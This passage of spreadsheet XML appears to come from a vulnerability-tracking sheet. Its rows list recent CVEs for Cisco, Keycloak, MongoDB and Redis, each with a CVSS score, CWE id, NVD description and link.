        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P152" s="5" t="inlineStr"/>
      <c r="Q152" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="R152" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the EIGRP implementation in Cisco Secure Firewall Adaptive Security Appliance (ASA) Software and Cisco Secure Firewall Threat Defense (FTD) Software could allow an unauthenticated, adjacent attacker to cause the device to reload unexpectedly, resulting in a denial of service (DoS) condition.
This vulnerability is due to improper resource management when handling EIGRP update messages. An attacker could exploit this vulnerability by sending crafted EIGRP updates at a high rate to an affected device. A successful exploit could allow the attacker to trigger a memory leak that will eventually cause the affected device to reload unexpectedly.</t>
        </is>
      </c>
      <c r="S152" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20222</t>
        </is>
      </c>
    </row>
    <row r="153">
      <c r="A153" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B153" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C153" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17526</t>
        </is>
      </c>
      <c r="D153" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E153" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F153" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G153" s="5" t="inlineStr"/>
      <c r="H153" s="5" t="inlineStr"/>
      <c r="I153" s="5" t="inlineStr"/>
      <c r="J153" s="5" t="inlineStr">
        <is>
          <t>keycloak</t>
        </is>
      </c>
      <c r="K153" s="5" t="inlineStr"/>
      <c r="L153" s="5" t="inlineStr"/>
      <c r="M153" s="5" t="inlineStr"/>
      <c r="N153" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O153" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P153" s="5" t="inlineStr"/>
      <c r="Q153" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R153" s="5" t="inlineStr">
        <is>
          <t>Keycloak is an open-source identity and access management solution. A vulnerability was discovered where a user with the impersonation role can impersonate a realm administrator. This allows the attacker to gain full administrative control over the realm, including the ability to manage users, clients, and roles.</t>
        </is>
      </c>
      <c r="S153" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17526</t>
        </is>
      </c>
    </row>
    <row r="154">
      <c r="A154" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B154" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C154" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76424</t>
        </is>
      </c>
      <c r="D154" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E154" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F154" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G154" s="5" t="inlineStr"/>
      <c r="H154" s="5" t="inlineStr"/>
      <c r="I154" s="5" t="inlineStr"/>
      <c r="J154" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K154" s="5" t="inlineStr"/>
      <c r="L154" s="5" t="inlineStr"/>
      <c r="M154" s="5" t="inlineStr"/>
      <c r="N154" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O154" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P154" s="5" t="inlineStr"/>
      <c r="Q154" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="R154" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the REST API of Cisco ISE could allow an authenticated, remote attacker to upload or copy arbitrary files on an affected device.
This vulnerability is due to insufficient validation in file operations. An attacker could exploit this vulnerability by uploading a file with a crafted path. A successful exploit could allow the attacker to upload files to arbitrary locations and execute arbitrary commands as root on the affected device.&amp;nbsp;To exploit this vulnerability, the attacker must have valid administrative credentials.</t>
        </is>
      </c>
      <c r="S154" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76424</t>
        </is>
      </c>
    </row>
    <row r="155">
      <c r="A155" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B155" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C155" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82061</t>
        </is>
      </c>
      <c r="D155" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E155" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F155" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G155" s="5" t="inlineStr"/>
      <c r="H155" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I155" s="5" t="inlineStr"/>
      <c r="J155" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K155" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L155" s="5" t="inlineStr"/>
      <c r="M155" s="5" t="inlineStr"/>
      <c r="N155" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O155" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P155" s="5" t="inlineStr"/>
      <c r="Q155" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R155" s="5" t="inlineStr">
        <is>
          <t>A use-after-free security issue exists in the server's query execution memory tracking subsystem. An authenticated user with read privileges can trigger a write to freed heap memory through a sequence of standard database commands, leading to server process crash or potential memory corruption. No user interaction is required.</t>
        </is>
      </c>
      <c r="S155" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82061</t>
        </is>
      </c>
    </row>
    <row r="156">
      <c r="A156" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B156" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C156" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82071</t>
        </is>
      </c>
      <c r="D156" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E156" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F156" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G156" s="5" t="inlineStr"/>
      <c r="H156" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I156" s="5" t="inlineStr"/>
      <c r="J156" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K156" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L156" s="5" t="inlineStr"/>
      <c r="M156" s="5" t="inlineStr"/>
      <c r="N156" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O156" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P156" s="5" t="inlineStr"/>
      <c r="Q156" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R156" s="5" t="inlineStr">
        <is>
          <t>Insufficient validation of storage engine configuration options in MongoDB Server allows an authenticated user with write privileges to supply crafted parameters during collection creation that override internal storage metadata. This results in an out-of-bounds memory write in the server process, causing a denial of service via server crash, with potential for further impact including arbitrary code execution.</t>
        </is>
      </c>
      <c r="S156" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82071</t>
        </is>
      </c>
    </row>
    <row r="157">
      <c r="A157" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B157" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C157" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20300</t>
        </is>
      </c>
      <c r="D157" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E157" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F157" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G157" s="5" t="inlineStr"/>
      <c r="H157" s="5" t="inlineStr"/>
      <c r="I157" s="5" t="inlineStr"/>
      <c r="J157" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K157" s="5" t="inlineStr"/>
      <c r="L157" s="5" t="inlineStr"/>
      <c r="M157" s="5" t="inlineStr"/>
      <c r="N157" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O157" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P157" s="5" t="inlineStr"/>
      <c r="Q157" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R157" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in Cisco ISE could allow an authenticated, remote attacker to conduct SQL injection attacks on an affected device. To exploit this vulnerability, the attacker must have at least low-privileged administrative credentials.
This vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted request to an affected device. A successful exploit could allow the attacker to read or modify data in the underlying database.</t>
        </is>
      </c>
      <c r="S157" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20300</t>
        </is>
      </c>
    </row>
    <row r="158">
      <c r="A158" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B158" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C158" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82052</t>
        </is>
      </c>
      <c r="D158" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E158" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F158" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G158" s="5" t="inlineStr"/>
      <c r="H158" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I158" s="5" t="inlineStr"/>
      <c r="J158" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K158" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L158" s="5" t="inlineStr"/>
      <c r="M158" s="5" t="inlineStr"/>
      <c r="N158" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O158" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P158" s="5" t="inlineStr"/>
      <c r="Q158" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="R158" s="5" t="inlineStr">
        <is>
          <t>The $regexFindAll expression can be used by an authenticated user who can run aggregation pipeline stages to crash a MongoDB server (mongod). Under certain specific conditions the  regex match can start in the middle of a multi-code-unit character, triggering an assertion during query execution.</t>
        </is>
      </c>
      <c r="S158" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82052</t>
        </is>
      </c>
    </row>
    <row r="159">
      <c r="A159" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B159" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C159" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82054</t>
        </is>
      </c>
      <c r="D159" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E159" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F159" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G159" s="5" t="inlineStr"/>
      <c r="H159" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I159" s="5" t="inlineStr"/>
      <c r="J159" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K159" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L159" s="5" t="inlineStr"/>
      <c r="M159" s="5" t="inlineStr"/>
      <c r="N159" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O159" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P159" s="5" t="inlineStr"/>
      <c r="Q159" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R159" s="5" t="inlineStr">
        <is>
          <t>A security issue exists in MongoDB server's JSON Pointer parser used during $jsonSchema query filter processing. When a find command includes a specially crafted $jsonSchema filter field, the parser processes the input without enforcing adequate limits on iteration count or total allocation size, resulting in significant memory amplification. Under concurrent request load, the cumulative memory consumption can exhaust available heap memory, causing the server's out-of-memory handler to terminate the mongod process and deny service to all connected clients.</t>
        </is>
      </c>
      <c r="S159" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82054</t>
        </is>
      </c>
    </row>
    <row r="160">
      <c r="A160" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B160" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C160" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82055</t>
        </is>
      </c>
      <c r="D160" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E160" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F160" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G160" s="5" t="inlineStr"/>
      <c r="H160" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I160" s="5" t="inlineStr"/>
      <c r="J160" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K160" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L160" s="5" t="inlineStr"/>
      <c r="M160" s="5" t="inlineStr"/>
      <c r="N160" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O160" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P160" s="5" t="inlineStr"/>
      <c r="Q160" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="R160" s="5" t="inlineStr">
        <is>
          <t>A security issue exists in MongoDB's 2dsphere index key generation that can cause a server crash due to a null pointer dereference. When a specially crafted GeoJSON document is inserted into a collection with a 2dsphere index, an inconsistency in geometry parsing can leave an internal object in an invalid, partially initialized state. During subsequent index key generation, access to this improperly initialized object results in a null pointer dereference that terminates the mongod process. An authenticated user with write access can use this to cause a denial of service.</t>
        </is>
      </c>
      <c r="S160" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82055</t>
        </is>
      </c>
    </row>
    <row r="161">
      <c r="A161" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B161" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C161" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82057</t>
        </is>
      </c>
      <c r="D161" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E161" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F161" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G161" s="5" t="inlineStr"/>
      <c r="H161" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I161" s="5" t="inlineStr"/>
      <c r="J161" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K161" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L161" s="5" t="inlineStr"/>
      <c r="M161" s="5" t="inlineStr"/>
      <c r="N161" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O161" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P161" s="5" t="inlineStr"/>
      <c r="Q161" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="R161" s="5" t="inlineStr">
        <is>
          <t>A security issue was discovered in MongoDB where an authenticated user with readWrite privileges could crash the mongod server process. By specifying a custom WiredTiger storage configuration option with an incompatible value during collection creation, a user could cause a type confusion in the storage engine layer. When documents were subsequently read from the misconfigured collection, the resulting mismatch in expected data format led to corrupted memory interpretation and a server crash. The crafted collection configuration persists across restarts, requiring manual operator intervention to remediate.</t>
        </is>
      </c>
      <c r="S161" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82057</t>
        </is>
      </c>
    </row>
    <row r="162">
      <c r="A162" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B162" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C162" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82058</t>
        </is>
      </c>
      <c r="D162" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E162" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F162" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G162" s="5" t="inlineStr"/>
      <c r="H162" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I162" s="5" t="inlineStr"/>
      <c r="J162" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K162" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L162" s="5" t="inlineStr"/>
      <c r="M162" s="5" t="inlineStr"/>
      <c r="N162" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O162" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P162" s="5" t="inlineStr"/>
      <c r="Q162" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="R162" s="5" t="inlineStr">
        <is>
          <t>A flaw in MongoDB's JSON Schema validation error generation code allows an authenticated user with readWrite privileges to crash the mongod server. When a BSON document containing an array with a malformed numeric field name fails a $jsonSchema items type constraint, the error generation path performs unsafe numeric conversion on the user-controlled field name without proper exception handling, resulting in an uncaught exception that terminates the server process. This is possible because incoming wire protocol BSON validation does not enforce that array element field names are valid, in-range numeric indices.</t>
        </is>
      </c>
      <c r="S162" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82058</t>
        </is>
      </c>
    </row>
    <row r="163">
      <c r="A163" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B163" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C163" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82065</t>
        </is>
      </c>
      <c r="D163" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E163" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F163" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G163" s="5" t="inlineStr"/>
      <c r="H163" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I163" s="5" t="inlineStr"/>
      <c r="J163" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K163" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L163" s="5" t="inlineStr"/>
      <c r="M163" s="5" t="inlineStr"/>
      <c r="N163" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O163" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P163" s="5" t="inlineStr"/>
      <c r="Q163" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="R163" s="5" t="inlineStr">
        <is>
          <t>A security issue in the MongoDB Server's storage engine integration layer allows an authenticated user with collection creation privileges to cause a persistent denial of service. Insufficient validation of user-supplied storage configuration options permits values that, once persisted to durable metadata, trigger a fatal assertion failure when the metadata is subsequently read by diagnostic operations. The corrupted metadata persists across server restarts and is replicated to other cluster members, requiring manual operator intervention to restore service.</t>
        </is>
      </c>
      <c r="S163" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82065</t>
        </is>
      </c>
    </row>
    <row r="164">
      <c r="A164" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B164" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C164" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82068</t>
        </is>
      </c>
      <c r="D164" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E164" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F164" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G164" s="5" t="inlineStr"/>
      <c r="H164" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I164" s="5" t="inlineStr"/>
      <c r="J164" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K164" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L164" s="5" t="inlineStr"/>
      <c r="M164" s="5" t="inlineStr"/>
      <c r="N164" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O164" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P164" s="5" t="inlineStr"/>
      <c r="Q164" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="R164" s="5" t="inlineStr">
        <is>
          <t>A security issue in MongoDB Server allows an authenticated user with write privileges to trigger a persistent fatal assertion crash by sending specially crafted retryable write commands. The crash state is durably persisted, causing the server process to repeatedly crash on restart and potentially propagating to additional nodes in a sharded cluster. Manual intervention is required to restore service availability.</t>
        </is>
      </c>
      <c r="S164" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82068</t>
        </is>
      </c>
    </row>
    <row r="165">
      <c r="A165" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B165" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C165" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82070</t>
        </is>
      </c>
      <c r="D165" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E165" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F165" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G165" s="5" t="inlineStr"/>
      <c r="H165" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I165" s="5" t="inlineStr"/>
      <c r="J165" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K165" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L165" s="5" t="inlineStr"/>
      <c r="M165" s="5" t="inlineStr"/>
      <c r="N165" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O165" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P165" s="5" t="inlineStr"/>
      <c r="Q165" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="R165" s="5" t="inlineStr">
        <is>
          <t>A security issue in MongoDB Server's diagnostic reporting interface allows an authenticated user with monitoring privileges to access insufficiently protected credentials from concurrent administrative operations. The same credentials are properly redacted in server log output, but the diagnostic interface omits equivalent redaction. Successful exploitation requires a valid authenticated session with monitoring-level permissions and results in exposure of cleartext credentials that could enable impersonation of other users, including privileged accounts.</t>
        </is>
      </c>
      <c r="S165" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82070</t>
        </is>
      </c>
    </row>
    <row r="166">
      <c r="A166" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B166" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C166" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82073</t>
        </is>
      </c>
      <c r="D166" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E166" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F166" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G166" s="5" t="inlineStr"/>
      <c r="H166" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I166" s="5" t="inlineStr"/>
      <c r="J166" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K166" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L166" s="5" t="inlineStr"/>
      <c r="M166" s="5" t="inlineStr"/>
      <c r="N166" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O166" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P166" s="5" t="inlineStr"/>
      <c r="Q166" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R166" s="5" t="inlineStr">
        <is>
          <t>A security issue in the MongoDB Server aggregation framework allows an authenticated user with limited read privileges to bypass view-level authorization checks and access data from unauthorized collections when Atlas Search features are in use. The issue stems from insufficient validation of an internal command parameter that can be set by external clients, causing a security check to be improperly skipped.</t>
        </is>
      </c>
      <c r="S166" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82073</t>
        </is>
      </c>
    </row>
    <row r="167">
      <c r="A167" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B167" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C167" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82074</t>
        </is>
      </c>
      <c r="D167" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E167" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F167" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G167" s="5" t="inlineStr"/>
      <c r="H167" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I167" s="5" t="inlineStr"/>
      <c r="J167" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K167" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L167" s="5" t="inlineStr"/>
      <c r="M167" s="5" t="inlineStr"/>
      <c r="N167" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O167" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P167" s="5" t="inlineStr"/>
      <c r="Q167" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R167" s="5" t="inlineStr">
        <is>
          <t>MongoDB Server contains an incorrect authorization vulnerability in the aggregation framework. An authenticated user with minimal privileges can craft a specially formatted aggregation request that causes the server's authorization subsystem to evaluate a different operation than what is actually executed, resulting in unauthorized read access to collection data within the target database.</t>
        </is>
      </c>
      <c r="S167" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82074</t>
        </is>
      </c>
    </row>
    <row r="168">
      <c r="A168" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B168" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C168" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92456</t>
        </is>
      </c>
      <c r="D168" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E168" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F168" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G168" s="5" t="inlineStr"/>
      <c r="H168" s="5" t="inlineStr"/>
      <c r="I168" s="5" t="inlineStr"/>
      <c r="J168" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="K168" s="5" t="inlineStr"/>
      <c r="L168" s="5" t="inlineStr"/>
